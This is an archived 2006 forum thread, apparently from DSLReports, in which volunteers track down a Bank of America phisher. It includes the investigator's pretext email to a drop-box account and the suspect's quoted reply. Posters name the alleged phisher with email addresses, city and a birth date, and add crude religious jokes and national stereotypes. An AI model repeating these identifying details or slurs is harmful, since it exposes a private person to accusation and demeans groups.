<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0" xmlns:blogChannel="http://backend.userland.com/blogChannelModule">

<channel>
<title>Re: [Phishing] Bank of America Phish, caught work in Spam, Scam and Phishbusters</title>
<link>http://www.dslreports.com/forum/r15186645</link>
<description></description>
<language>en</language>
<pubDate>Thu, 03 Dec 2009 02:35:25 EDT</pubDate>
<lastBuildDate>Thu, 03 Dec 2009 02:35:25 EDT</lastBuildDate>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15423383</link>
<description><![CDATA[<A HREF="/useremail/u/314530"><b>NormanS</b></A> : <div class="bquote"><SMALL>said by  Derfel <A HREF="/useremail/u/1020125"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br>Muslims don't like crime.<br> </DIV>Which has what to do with anything? Muslim nations suffer crime (as do a lot of nations, not all of them Muslim); some of which crime isn't criminal in the U.S.<br><div class="bquote">Muslims also don't like having RAM shoved up their rectal cavities.<br> </DIV>Which has what to do with anything? Buddhists, Christians, Hindus, Jews, and Shintoists don't like it, either; but it happens.<br><div class="bquote">Both of these are happening as I post, if my sources are correct.<br> </DIV>I have no way to vet your unnamed sources, so it is your source's words against anybody else's words. If you have something to say, then say it. Just saying, "It ain't so", is not contributing anything useful.<br><SMALL>--<br>Norman<BR>~Oh Lord, why have you come<BR>~To Konnyu, with the Lion and the Drum</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15423383</guid>
<pubDate>Tue, 07 Feb 2006 14:20:40 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15420625</link>
<description><![CDATA[<A HREF="/useremail/u/195618"><b>rawwhide</b></A> : <div class="bquote"><SMALL>said by  izy <A HREF="/useremail/u/205255"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br><div class="bquote"><SMALL>said by  Thaler <A HREF="/useremail/u/945359"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>  :</SMALL><br><br><div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>   :</SMALL><br><br>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.</DIV>Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.<br> </DIV>ROFLMAO!!! :D<br> </DIV>12 hours later and I still can't stop laughing, thanks for the good laugh.<br><SMALL>--<br>HUH!!! <A HREF="http://www.sekurecom.com/">Sekurecom</A></SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15420625</guid>
<pubDate>Tue, 07 Feb 2006 04:41:04 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15419726</link>
<description><![CDATA[<A HREF="/useremail/u/254898"><b>pcdebb</b></A> : <div class="bquote"><SMALL>said by  tfrionli <A HREF="/useremail/u/416080"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br>Nice work..<br><br>Macs Restub<br><br>scaM busteR<br><br>:)<br> </DIV>hahaha!!!  I just caught on to that one, that is absolutely hilarious!!<br><br>MGD, you rock ;)<br><SMALL>--<br><A HREF="http://pcdebb.blogspot.com/">babbling</A> | <A HREF="http://www.broadbandreports.com/forum/weather">How's the weather?</A></SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15419726</guid>
<pubDate>Tue, 07 Feb 2006 00:01:59 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15418129</link>
<description><![CDATA[<A HREF="/useremail/u/856446"><b>Scott W</b></A> : ...]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15418129</guid>
<pubDate>Mon, 06 Feb 2006 20:45:55 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15417723</link>
<description><![CDATA[<A HREF="/useremail/u/1020125"><b>Derfel</b></A> : Muslims don't like crime. Muslims also don't like having RAM shoved up their rectal cavities. Both of these are happening as I post, if my sources are correct.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15417723</guid>
<pubDate>Mon, 06 Feb 2006 19:59:17 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15417300</link>
<description><![CDATA[<A HREF="/useremail/u/910659"><b>inteller</b></A> : I think this guy doesn't need to quit his day job (working for Dell tech support)<br><SMALL>--<br>"WHEN THE LAUGH TRACK STARTS THEN THE FUN STARTS!"</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15417300</guid>
<pubDate>Mon, 06 Feb 2006 19:10:44 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15416390</link>
<description><![CDATA[<A HREF="/useremail/u/581232"><b>removed</b></A> : I'm pretty sure he's referring to himself as a baby - someone who has no life experience so far.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416390</guid>
<pubDate>Mon, 06 Feb 2006 17:13:50 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15416373</link>
<description><![CDATA[<A HREF="/useremail/u/429050"><b>La Luna</b></A> : <div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><br><br>....not true I just new baby born in the earth. Please advice me to be nice people.....<br><br>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.<br><br>Love and Peace<br><br>Purisangeh (.)(.) -- lick it.<br> </DIV>You just graduated from high school and you have a new baby? So this is the kind of person you want to be to your child, a criminal? That's just great.....<br><br>We don't care if you're a Muslim, we only care that you are a criminal, hurting other people. If you have the skills you claim you do, do something good with them. I'm sure your child will think much more highly of you.<br><SMALL>--<br>~~Then the rainstorm came over me and I felt my spirit break; I had lost all of my belief you see, and realized my mistake...~~</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416373</guid>
<pubDate>Mon, 06 Feb 2006 17:11:06 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15416351</link>
<description><![CDATA[<A HREF="/useremail/u/923463"><b>KyeU</b></A> : What a noob; didn't use a proxy server to send the E-Mail...even I know that and I'm only 17.<br><br>But I have not chosen the dark side, as this talented individual has.<br><br> <BLOCKQUOTE><SMALL>quote:</SMALL><HR>Date of Birth:<br>October 17, 1982 &#9;<br>Age:<br>23<HR></BLOCKQUOTE>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416351</guid>
<pubDate>Mon, 06 Feb 2006 17:07:20 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15416270</link>
<description><![CDATA[<A HREF="/useremail/u/416080"><b>tfrionli</b></A> : Nice work..<br><br>Macs Restub<br><br>scaM busteR<br><br>:)<br><SMALL>--<br>tfrionli</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15416270</guid>
<pubDate>Mon, 06 Feb 2006 16:56:59 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15415172</link>
<description><![CDATA[<A HREF="/useremail/u/1324349"><b>ass assassin</b></A> : just turn him into bank of america.. i mean, a 50 billion dollar a year bank sure would be interested in talking to him, along with the secret service and fbi..  this boy has made a big mistake.. <br><br>from the bank of america website:<br><br>Email and online fraud <br><br>To report a suspicious email that uses Bank of America's name, forward it to us immediately at abuse@bankofamerica.com. (If you have general questions about the bank or your accounts, please go to Contact Us.) <br>Learn more about online fraud and email fraud. <br>See an example of a fraudulent email <br><br> <br>Suspect you are a victim of fraud? <br>Report fraudulent activity not associated with Online Banking:<br> <br><br>In California CA: 800-678-1433 <br>In Idaho and Washington ID, WA: 800.442.6680 <br>All others states: 800-432-1000 <br><br> <br>Report fraudulent activity within Online Banking:<br> <br><br>In California CA: 800-792-0808 <br>In Idaho and Washington ID, WA: 800-442-6680 <br>All other states: 800-933-6262  <br><br>I am sure they would be interested in getting someone like this.. sure would help their corporate image and fighting phishing scams and such, eh?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415172</guid>
<pubDate>Mon, 06 Feb 2006 15:45:48 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415691</link>
<description><![CDATA[<A HREF="/useremail/u/205255"><b>izy</b></A> : <div class="bquote"><SMALL>said by  Thaler <A HREF="/useremail/u/945359"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR><div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>  :</SMALL><BR><BR>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.</DIV>Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.<br> </DIV>ROFLMAO!!! :D]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415691</guid>
<pubDate>Mon, 06 Feb 2006 15:42:05 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415600</link>
<description><![CDATA[<A HREF="/useremail/u/945359"><b>Thaler</b></A> : <div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.</DIV>Please just get your scrawny ass back to farming WoW gold. I still need my epic mount.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415600</guid>
<pubDate>Mon, 06 Feb 2006 15:28:39 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415478</link>
<description><![CDATA[<A HREF="/useremail/u/705588"><b>91439306</b></A> : It's because these nations have very corrupt governments and the people are profoundly impoverished because of the economic results of corruption.<br>My stay in the Philippines (Taguig, Pasay, Baguio areas) taught me a lot about the nature of people. There are some that will accept their poverty and immerse themselves in religion on the hope of salvation at death, viewing this as a prelude to an eternal life in "heaven", and there are those who are probably, for lack of a better term, not sucked in by that religious BS and do the only easy thing they know how to, with their new found computer skills. So they resort to spamming and scamming.<br>Having lived in such a country for a while, I can appreciate the utter hopeless situation of economics there. There is NO way to be a success in the Philippines, unless you're Lea Salonga, a popular singer, liked by all Filipinos, or unless you are one of the few lucky ones to get out of the country by marrying a foreigner.<br>That doesn't change the fact that what the scammers do is totally wrong and subject to severe penalties. It only serves to answer the implicit question: "Why?"<br><SMALL>--<br>Take care,<BR><BR>Mark & Mary Ann Weiss<BR><BR>Hear my Kurzweil Creations at: &raquo;<A HREF="http://www.dv-clips.com/theater.htm" >www.dv-clips.com/theater.htm</A><BR>'&raquo;<A HREF="http://www.mwcomms.com/auctions.htm" >www.mwcomms.com/auctions.htm</A><BR>'&raquo;<A HREF="http://www.mwcomms.com" >www.mwcomms.com</A><BR>'&raquo;<A HREF="http://www.adventuresinanimemusic.com" >www.adventuresinanimemusic.com</A><BR> Stereo Feed!</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415478</guid>
<pubDate>Mon, 06 Feb 2006 15:09:32 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15415254</link>
<description><![CDATA[<A HREF="/useremail/u/282779"><b>Jon Geb</b></A> : Why does it seem that Indonesia, Philippines and all these countries are so full of scammers? It's been this way for years.<br><br>I remember about 5 years ago I was looking for a second job and saw an ad in the Detroit News for a "courier" position. I called it and got some American telling me the job was to empty pay phones and deposit the money into a specific account. He told me the job was contracted by the local bell phone companies.<br><br>It sounded odd and then he went on to tell me I had to pay a deposit of $400 in order to get started. The alarm started going off right when I heard that. So I humored him and asked him where I was to send the money and info. The address was the Philippines.<br><br>Needless to say I knew the scam right then and there.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15415254</guid>
<pubDate>Mon, 06 Feb 2006 14:32:55 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15414952</link>
<description><![CDATA[<A HREF="/useremail/u/1239522"><b>ScottK1</b></A> : Oh, this is perfect.  You have the cojones to commit a felony that could potentially cost innocent people (who work for a living unlike yourself) thousands upon thousands of dollars, and yet you want us to go easy on you because you are a youngster, probably about 17 or thereabouts.  People have been going easy on you for your entire life, and it is finally time for you to be a man and face the consequences of your choice. This is, as kids your age like to say, "some serious shit."<br><br>If you don't appreciate the seriousness of what you have done, look at it this way:  In essence, you have just attempted a bank robbery. Let's add attempted identity theft to the charges as well.  Think you better take your shorts off and have your mommy wash them...you just peed your pants, didn't you?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414952</guid>
<pubDate>Mon, 06 Feb 2006 13:51:27 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15414934</link>
<description><![CDATA[<A HREF="/useremail/u/582272"><b>RyanG1</b></A> : I agree, you have my vote as well as any resources I have that you'd need, just drop a line.<br><br>Keep up the good work.<br><br>Ryan<br><SMALL>--<br>Oh I wish i was an oscar meyer wiener, then everyone would be in love with me....</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414934</guid>
<pubDate>Mon, 06 Feb 2006 13:48:46 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15414851</link>
<description><![CDATA[<A HREF="/useremail/u/564018"><b>Shack</b></A> :   Great Job!  Take down this POS.  Even though most of the people who this will benefit will never know to thank you, I will do it in their place.  Thanks.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414851</guid>
<pubDate>Mon, 06 Feb 2006 13:37:57 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15414802</link>
<description><![CDATA[<A HREF="/useremail/u/1305066"><b>briartech</b></A> : <div class="bquote"><SMALL>said by  catseyenu <A HREF="/useremail/u/517760"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR>I've got some Indonesian contacts tracking him now.<br>He'd better not have any "nervous" associates or he's toast.<br> </DIV>I know who you are too, so I know that what you said is true. Sooner or later, we'll all be watching one another.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15414802</guid>
<pubDate>Mon, 06 Feb 2006 13:30:15 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15403870</link>
<description><![CDATA[<A HREF="/useremail/u/279131"><b>jig</b></A> : haven't been back to Indonesia/Jakarta since 9/11, but i still have some friends there... heh, might take some bribes to get the police involved, however.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15403870</guid>
<pubDate>Sat, 04 Feb 2006 19:19:13 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15402208</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : <div class="bquote"><SMALL>said by  waldoooo <A HREF="/useremail/u/540015"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR> ....I doubt anyone tipped him off, google his name again and guess what's on the top of the list<br> </DIV>Yep, finally got his name in lights, hit the big time at last.<br><br>Actually, this one is just as interesting: &raquo;<A HREF="http://www.tempointeractive.com/komentar/?berita=brk,20051011-67813,uk.html&act=read" >www.tempointeractive.com/komenta&middot;&middot;&middot;act=read</A> While he is working on his phishing scams he is also posting locally. Way to go Ariando !! maybe you will get some "police pressure" soon!. On that post you listed Yogyakarta as your home. I thought you were a jazz musician from New Zealand.? ;) Very confident huh?, you must have thought that no one would ever crack your phishes, and see your email address. <br><br>MGD]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15402208</guid>
<pubDate>Sat, 04 Feb 2006 14:50:31 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15401953</link>
<description><![CDATA[<A HREF="/useremail/u/540015"><b>waldoooo</b></A> :  <BLOCKQUOTE><SMALL>quote:</SMALL><HR>reply to Anon<br>Re: [Phishing] Bank of America Phish, caught work<br><br>I guess someone must have sent you a "HEADS UP"<HR></BLOCKQUOTE><br><br>I doubt anyone tipped him off, google his name again and guess what's on the top of the list]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15401953</guid>
<pubDate>Sat, 04 Feb 2006 14:07:57 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15399930</link>
<description><![CDATA[<A HREF="/useremail/u/517760"><b>catseyenu</b></A> : I've got some Indonesian contacts tracking him now.<br>He'd better not have any "nervous" associates or he's toast.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15399930</guid>
<pubDate>Sat, 04 Feb 2006 05:32:37 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15398895</link>
<description><![CDATA[<A HREF="/useremail/u/1116779"><b>spanishbob</b></A> : Enjoying this one, will follow.  Would be nice to see this little $hitbag caught.  Does FBI coordinate with local police to catch these guys? Even Kiwis have better spelling than that!]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15398895</guid>
<pubDate>Sat, 04 Feb 2006 00:03:56 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15398507</link>
<description><![CDATA[<A HREF="/useremail/u/0"><b>anon</b></A> : MGD that's hilarious!  Good post, most of those phishers are just wanna-be's trying to make a buck the wrong way.  Sooner or later it always catches up, whether it's police or someone knocking on their door .....   that post is hilarious!]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15398507</guid>
<pubDate>Fri, 03 Feb 2006 23:06:07 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15397407</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : I guess someone must have sent you a "HEADS UP" <br><br><div class="bquote"><SMALL>said by  purisangeh <A HREF="/useremail/u/1323263"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A>  :</SMALL><BR><BR>Thank you Macs Retsub for your Big mouth ...... You want be a hero here? </DIV>Hey that's only a small price that you pay for being a thief and a criminal. Nope, I am not a hero, I just volunteer my time and forensic cyber skills to try and prevent victims from being defrauded.<br><br>You are now a member, read my scam hunting posts. I am an "equal opportunity" scam hunter. I follow the trail wherever it leads. Scammers are everywhere, they come in all shapes, sizes, and religions.<br><br><div class="bquote">....You do not have enough proof to catch me....</DIV> <br>Don't bet on it junior!!! Maybe you will read an article about this in your local paper <A HREF="http://www.pikiran-rakyat.co.id/cetak/">Pikiran Rakyat</A><br>. I am sure that the people of Bandung do not like thieves any more than we do.<br><br><div class="bquote">I hope I can see you as soon as possible, to disccuss our future....</DIV> <br><br>Sure, just so long as your future includes paying a price for your crimes. I have found your fingerprints on many other phishes, so you have been doing this for a while.<br><br><div class="bquote">I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet.....</DIV>Great, so why are you using those skills to commit crimes??<br>instead of doing productive work. Will the universities let you in if they know what you are doing?<br><br>Do not be an idiot and bring race and religion into it. You are a criminal, you got busted !! Face up to it junior..<br><br>You spend a lot of time at that Internet Cafe, do you work or live there?? 
Your emails came from 3 different IP's at the Cafe within a few hours.<br><br>MGD<br><br><SMALL>Edit+added link</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15397407</guid>
<pubDate>Fri, 03 Feb 2006 20:19:00 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15395992</link>
<description><![CDATA[<A HREF="/useremail/u/581232"><b>removed</b></A> : You must not be that good if ol'  MGD <A HREF="/useremail/u/666842"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> found you. :)]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15395992</guid>
<pubDate>Fri, 03 Feb 2006 17:13:52 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15395983</link>
<description><![CDATA[<A HREF="/useremail/u/1323263"><b>purisangeh</b></A> : Thank you Macs Retsub for your Big mouth to all pigs here. You want be a hero here? I advice you that wash your feet and take a nap your mommy waiting you.<br><br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br>Date: Thu, 2 Feb 2006 16:26:47 -0500 <br>From: "Macs Retsub"   Add to Address Book  Add Mobile Alert <br>Yahoo! DomainKeys has confirmed that this message was sent by gmail.com. Learn more <br>To: "ariando huge"  <br>Subject: Re: Kaskus <br>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br><br>around hundreds peoples around you doing spam. Why you not againts them near you ?? I have been seen your people, on my cyber cafe. You do not have enough proof to catch me. I hope I can see you as soon as possible, to disccuss our future. I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet and i just graduated my senior high school. I am hacker? not true I just new baby born in the earth. Please advice me to be nice people.<br><br>I hope God Bless you all.<br><br>Our Father Who art in Heaven, hallowd be thy name, thy kingdom come .....<br><br>I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.<br><br>Love and Peace<br><br>Purisangeh (.)(.) -- lick it.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15395983</guid>
<pubDate>Fri, 03 Feb 2006 17:12:33 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15394477</link>
<description><![CDATA[<A HREF="/useremail/u/540015"><b>waldoooo</b></A> : I like following the threads of MGD & crew as they help "would be" victims and shut down the thieves.  I don't know how Yahoo or the other companies work but it would seem to me that with a few emails to some of the "higher ups" in the companies showing the amount of people helped and scams broken up by MGD and the group here you guys should be able to get either a phone # or at least a direct email address to a support person  who could take action and shut down the fraudulent accounts.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15394477</guid>
<pubDate>Fri, 03 Feb 2006 13:45:06 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15394308</link>
<description><![CDATA[<A HREF="/useremail/u/387481"><b>daniyel</b></A> : Good work  - that's the way it's done. I had an instance (few of them) where we had AOL employee site posted on our web servers in the middle of the night. By AM, there was already enough hits generated (by emailing internal emp notice/chass pass/update account) to be quite scary, for AOL. I found the creator of the account, ICQ account member the info was being sent after decrypting a cheesy html algorithm. Hosting company didn't want to do anything except turn the accounts off - and refund charges to stolen CC's. After the 6th-7th account, and getting them turned off rapidly, phishers went away and bothered some other host. ]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15394308</guid>
<pubDate>Fri, 03 Feb 2006 13:23:45 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15393212</link>
<description><![CDATA[<A HREF="/useremail/u/1031550"><b>tapeloop</b></A> : MGD, more power to you my brother.  I wish I knew Bahasa so I could help you slam dunk this guy.  Keep up the good work and keep us posted.<br><SMALL>--<br>Copyright infringement is illegal. Murder is illegal. Therefore, file sharing is murder.</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15393212</guid>
<pubDate>Fri, 03 Feb 2006 11:05:11 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15392937</link>
<description><![CDATA[<A HREF="/useremail/u/475168"><b>pleekmo</b></A> : <div class="bquote"><SMALL>said by Ummmyea :</SMALL><br><br>How is your email not traceable?<br> </DIV>Anonymous re-mailer, perhaps.<br><SMALL>--<br>HCN: Because you deserve a rest!<BR><BR>I wonder what Spock would have to say (or do) about <I>Omelas</I>?</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15392937</guid>
<pubDate>Fri, 03 Feb 2006 10:27:31 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15392864</link>
<description><![CDATA[<A HREF="/useremail/u/0"><b>anon</b></A> : How is your email not traceable?]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15392864</guid>
<pubDate>Fri, 03 Feb 2006 10:17:46 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15391819</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : Interesting follow up:<br><br>Though the digging through phishes looking for and extracting the email drop boxes is both tedious and time consuming, what irks me the most is the failure of the majors to yank the accounts despite frequent larts. If these drop box accounts were pulled promptly, it would prevent the phised data from being recovered. Now that most of the email providers have forsaken the abuse@ and gone to online forms for complaints (Gmail,Yahoo etc.), they have no easy method for reporting them. Getting clueless replies requesting the email headers from the "offending account", despite including snippets from the code clearly indentifying the email address as part of a scam, is frustrating. By the time the issue is escalated to a clued rep, the data is long gone.<br><br>With that in mind, I sometimes go back a few weeks afterwards, and recheck the dpop accounts to see if they were cancelled. In addition to using the Rcp to @ the mx server, I also send an email to the address to see if it bounces. I usually include some benign reference to the Phish to see if I can elicit a response, and every now and then I get one.<br><br>Two days ago I tested the purisangeh_team@yahoo.com drop box on this BOA phish, now over a month old. I always want to include some trigger in the subject line to try and get attention. 
In this case I listed the subject as "KASKUS" which is an Indonesian chat forum that was one of the few places where the name Purisangeh had turned up as a poster: &raquo;<A HREF="http://www.kaskus.com/member.php?u=69571" >www.kaskus.com/member.php?u=69571</A> Indonesia became a focus since a previous identical BOA phish which was reported in NANAS on 12/05, was also emailed via the exact same open proxy as this one: &raquo;<A HREF="http://groups.google.com/group/news.admin.net-abuse.sightings/browse_frm/thread/ca18234941121d78/18e0f993e0261745?lnk=st&q=66.235.195.160&rnum=4&hl=en#18e0f993e0261745" >groups.google.com/group/news.adm&middot;&middot;&middot;e0261745</A> Coincidentally that phish site was hosted on a hijacked box in Indonesia.<br><br>So I sent off the following email to the phish drop box:<br><br><HR><I>From: Macs Retsub <br>To: purisangeh_team@yahoo.com<br>Date: Feb 1, 2006 5:53 PM<br>Subject: Kaskus<br><br>Hey, I still have the files from the Bank of America phish.<br>The address  rdcpt0809@airpost.com  is dead.<br>Which other one can I use??  <br> <br>I have the logs too.</I><HR><br><br>I try to make them fuzzy, but throw in a few clues, and hope they respond with their guard down. Well about 24 hours later in pops this:<br><br><HR><I>From: ariando huge <br>To: Macs Retsub <br>Date: Feb 2, 2006 4:06 AM<br>Subject: Re: Kaskus<br><br>What are you talking about???</I><HR><br><br>Ahh, got a hit !! 
